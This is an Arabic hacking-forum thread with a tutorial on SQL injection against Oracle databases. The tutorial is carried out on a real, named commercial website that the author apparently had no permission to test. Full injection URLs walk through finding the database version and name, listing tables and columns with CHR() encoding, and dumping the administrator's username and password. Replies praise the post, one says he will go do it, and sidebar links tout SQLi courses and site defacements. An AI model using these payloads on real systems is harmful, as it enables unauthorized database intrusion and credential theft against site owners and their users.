1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

[ شرح ] حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

الموضوع في '[ SQL-injection ]' بواسطة Fox, بتاريخ ‏2 ابريل 2014.

كاتب الموضوع : Fox المشاهدات : 762 الردود : 7 ‏2 ابريل 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Fox
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    الصلاة و السلام على أشرف المرسليـن
    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا
    من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا
    و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم
    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين

    اليوم سنتكلم عن حقن قواعد البيانات الــــ ORACLE

    ان شاء الله

    [​IMG]

    واقوم بتوضيح الاستعلامات التي نخاطب بها هذا النوع من القواعد ان شاء الله
    وتخطي حيل المبرمجين ونقوم بجلب البيانات المستخرجة حتى وان كانت مخفيه
    وسحاول ابسط الفكره لحقن مثل هذا النوع ان شاء الله نبدأ
    مع العلم هي شبية بحقن قواعد البيانات MySql
    مما يعني طرق التخاطب لا في استعلام الأوامر
    راح انطبق الدرس على هالموقع التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=PHILEO-914UV
    وبالطريقة الروتينية
    وبوضع سنكل كويتث '
    في نهاية الرابط

    [​IMG]

    كما نلاحظ فالصورة من خلال الخطأ الضاهر لدينا تبين ان لنا نوع القاعده هي ORACLE

    طيب نحدد عدد الأعمده بالاستعلام المعروف
    order by
    امر استعلام واضح
    وبالطريقة التقليديه يعني نضل نقلل ليما يختفي الخطأ عندها حددنا عدد الاعمده
    بعد ما حددنا عدد الاعمدة وهي 4

    هنا نقوم بتحديد العمود المصاب عن طريق الاستعلام
    union select
    هنا ما راح نكتب عدد الاعمده بقيمه رقميه راح نعوض عن كل عمود بقيمه فارغه اي نصيه
    اي
    1 = null
    وهكذا
    يعني الاستعلام يكون بهذا الشكل

    كود PHP:
    union select null,null,null,null
    مع الحاق نهايه الحقنه بالأمر الآتي

    كود PHP:
    from%20v$version من اصدار القاعدة هنا ارفقنا هذا الامر لنتعرف على الاعمده المصابه لستكمال استغلالنا
    لنحصل على ما نريد من معلومات
    طيب الاستعلام يصبح بهذا الشكل

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20NULL,NULL,NULL,NULL%20from%20v$version+--+
    لو تلاحظ في الصفحة حق الموقع ماظهرت اي معلومات او عمود مصاب
    طيب في طريقه لأظهار الاعمده بالصفحة نشوف كيفية استخراج الأعمد المصابة
    بستبدال القيمه null بــــــــ '1'
    يعني مكان اول قيمه فارغه نستبدلها بــــــــ '1'
    يعني كل قيمه فارغه نستبدلة برقم و وضع كل رقم مابين علامتي تنصيص
    يعني مكان اول قيمه فارغه نستبدله اذا مشت الحقنه وما ضهر خطأ في الصفحه اذن العمود مصاب واذا ضهر خطأ يعني العمود ليس مصاب انخلي قيمه فارغه
    هذه الطريقه استخدمنها لتحديد الاعمده المصابه
    هنا ماشاء الله الاعمده كله مصابه يعني الحقنه راح اتكون على النحو التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%273%27,%274%27%20from%20v$version+--+
    لو نلاحظ في صفحة الموقع لم تظهر اي بيانات
    طيب هنا صاحب السكربت مخبئ المعلومات في سورس الصور
    طيب كلك يمين على اي صوره بالصفحه ونذهب كما موضح بالصورة

    [​IMG]

    ستضهر لنا مصدر الصور كما في الصورة

    [​IMG]

    كما نلاحظ الاعمده المصابه هنا مخبأه

    الآن لنتعرف على اصدار القاعدة
    نفس الاستعلام السابق ولكن نضع مكان العمود المصابه الامر

    كود PHP:
    BANNER =  هنا استخدمناه لكي تضهر لنا اصدار القاعده يعني كبصمه لاستخراج  المعلومات في مكان العمود المصاب وهذه خاصة في قواعد الاوراكل
    لاحظ الحقنه

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,BANNER,%274%27%20from%20v$version+--+
    [​IMG]

    كما نلاحظ الاصدار واضح بالصورة CORE11.1.0.6.0Production

    الآن نستخرج اسم القاعدة عن طريق وضع

    كود PHP:
     SYS.DATABASE_**** = امر استخراج اسم قاعدة البيانات الخاصة بالاوراكل
    مكان العمود المصاب ثم الحاق اخر الحقنة بالامر
    FROM DUAL 
    هذا جدول نستعين به لاكمال شروط الحقنه اي لجلب المعلومات   باستعلام صحيح وهو جدول انشئته اوراكل بنفسها يتعامل مع قواعد البيانات   لجلب البيانات التاريخ وما شابه هنا راح نستغله لجب اسم القاعده
    لتصبح الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,SYS.DATABASE_****,%274%27%20from%20DUAL+--+
    [​IMG]

    كما موضح فالصورة اسم القاعدة HIMSDB

    الآن ننتقل الى اضهار الجداول والحقول معاَ
    عن طريق الاستعلام التالي

    كود PHP:
    (table_****||chr(58)||column_****) امر استعلام واضح كما بينا في دروس سابقة ونضعه مكان العمود المصاب 
    مع الحاق اخر الحقنه بالامر التالي
    from USER_TAB_COLUMNS 
    من اسماء الجداول والاعمده مصطلح خاص بقواعد الاوراكل
    لتصبح الحقنة بهذا الشكل !:"

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from%20USER_TAB_COLUMNS+--+
    [​IMG]

    كما نلاحظ في الصورة ضهور اول جدول و أول عمود من قاعدة البيانات

    الآن التنقل الى الجداول البقيه من خلال

    كود PHP:
    تحويل اسم الجدول الى تشفيرة من نوع chr()  الخاصة بقواعد الاوراك
    يعني نحول
    TABLE_
    **** = ORACLE CHR()
    من خلال الأضافه الـــ HackBar
    احدى اضافات الفايرفوكس
    أول جدول ضهر لنا هو AS_FLTR_EXCH_HISY
    بعد ما قمنا بتحويله يصبح

    كود PHP:
    CHR(65) || CHR(83) || CHR(95) || CHR(70) || CHR(76) || CHR(84) ||  CHR(82) || CHR(95) || CHR(69) || CHR(88) || CHR(67) || CHR(72) ||  CHR(95) || CHR(72) || CHR(73) || CHR(83) || CHR(89)
    مع الحاق الحقنة بالامر

    كود PHP:
    Where table_****> = اينما تجد الجدول الفلاني اجلبلي الي بعده او الاكبر منه و هكذا
    لتصبح الحقنه بشكل التالي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from%20USER_TAB_COLUMNS%20where%20table_****%3E%20%20CHR%2865%29%20||%20CHR%2883%29%20||%20CHR%2895%29%20||%20CHR%2870%29%20||%20CHR%2876%29%20||%20CHR%2884%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2869%29%20||%20CHR%2888%29%20||%20CHR%2867%29%20||%20CHR%2872%29%20||%20CHR%2895%29%20||%20CHR%2872%29%20||%20CHR%2873%29%20||%20CHR%2883%29%20||%20CHR%2889%29+--+
    [​IMG]

    كما نلاحظ الجدول الثاني والعمود الأول لجدول الثاني

    لأستخراج الجداول البقية كما اسردنا سابقاَ
    الآن نختصر الطريقه باستخراج جدول اليوزر لاحظ الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29+--+
    [​IMG]

    كما موضح جدول اليوزر مع ضهور اول عمود لجدول اليوزر
    PL_USER = جدول اليوزر
    ADDR_1 = العمود الآول لجدول اليوزر

    الآن نريد التنقل بين الاعمدة لجدول اليوزر
    نضيف الامر التالي بعد الجدول المشفر بقيمة chr
    and column_****> = اجلبلي العمود الي بعدة
    بنفس الكلام الي فوق نحول اسم العمود الى قيمة chr العمود الاول الي استخرجنا من جدول اليوزر هو ADDR_1

    كود PHP:
    CHR(65) || CHR(68) || CHR(68) || CHR(82) || CHR(95) || CHR(49)  =  اسم العمود بعد التشفير
    لتصبح الحقنة

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20CHR%2865%29%20||%20CHR%2868%29%20||%20CHR%2868%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2849%29+--+
    شوف السورس ضهر ثاني عمود
    نختصر على السريع انا استخرجت عمود اليوزر والباسورد لجدول اليوزر
    لاحظ الحقنه
    هذه لليوزر

    كود PHP:
     http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2876%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2869%29%20||%20CHR%2876%29+--+
    وهذه للباسورد

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28table_****||chr%2858%29||column_****%29,%274%27%20from+USER_TAB_COLUMNS%20where%20table_****%3E%20%20%20CHR%2880%29%20||%20CHR%2876%29%20||%20CHR%2895%29%20||%20CHR%2882%29%20||%20CHR%2869%29%20||%20CHR%2886%29%20||%20CHR%2873%29%20||%20CHR%2869%29%20||%20CHR%2887%29%20and%20column_****%3E%20%20%20CHR%2885%29%20||%20CHR%2883%29%20||%20CHR%2869%29%20||%20CHR%2882%29%20||%20CHR%2895%29%20||%20CHR%2878%29%20||%20CHR%2879%29+--+
    كما نلاحظ في الصوره

    [​IMG]

    الآن استخراج بيانات الأعمدة لعمود اليوزر والبسورد من جدول اليوزر
    لاحظ الحقنة بشكل النهائي

    كود PHP:
    http://m.hanilworld.co.kr/product/view.php?mid=-PHILEO-914UV%27%20union%20select%20%271%27,%272%27,%28USER_****||chr%2858%29||USER_PWD%29,%274%27%20from+PL_USER+--+
    كما نلاحظ في الصورة اليوزر والباسورد للادمن

    [​IMG]

    الى هنا ارجو اني قد وفقت في ايصال المعلومة واسف اذا اخطأت في شي
    واعذروني على الاطالة واي استفسار انا حاضر
    في امان الله :{11}:
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    MAX PWORE
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏16 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    وعليكم السلام ..
    شرح ولا اروع حبيبي
    واصل ولا تحرمنا من حصرياتك &:":
     


  3. غير متصل

    saudi-hack
    Developer

    عضو منذ:
    ‏30 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    يعطيك الف عافية يا غالى
     


  4. غير متصل

    th3j0cker
    rankrank
    Developer

    عضو منذ:
    ‏28 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    تسلم ايدك يالغالي شرح رائع ​
     


  5. غير متصل

    H̷e̷l̷l̷ N̷i̷g̷h̷t̷
    rank
    Developer

    عضو منذ:
    ‏27 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    بارك الله فيك
    جاري لقيام بالازم i:q^:
     


  6. غير متصل

    H̷e̷l̷l̷ N̷i̷g̷h̷t̷
    rank
    Developer

    عضو منذ:
    ‏27 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    ماذا تعتقد في مشاركة Fox؟
    يعجبني ويستحق التقييم :!."​
     


  7. غير متصل

    SOME1ONE
    rankrank
    Developer

    عضو منذ:
    ‏26 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    وعليكم السلام ورحمة الله وبركاته

    مجهود رائع اخي )5:"​
     


  8. غير متصل

    Dr.Azoz
    rankrank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات اوراكل وتخطي اخفاء البيانات+ sqli oracle skip hide

    تسلم اخي وبارك الله فيك :{1}:
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...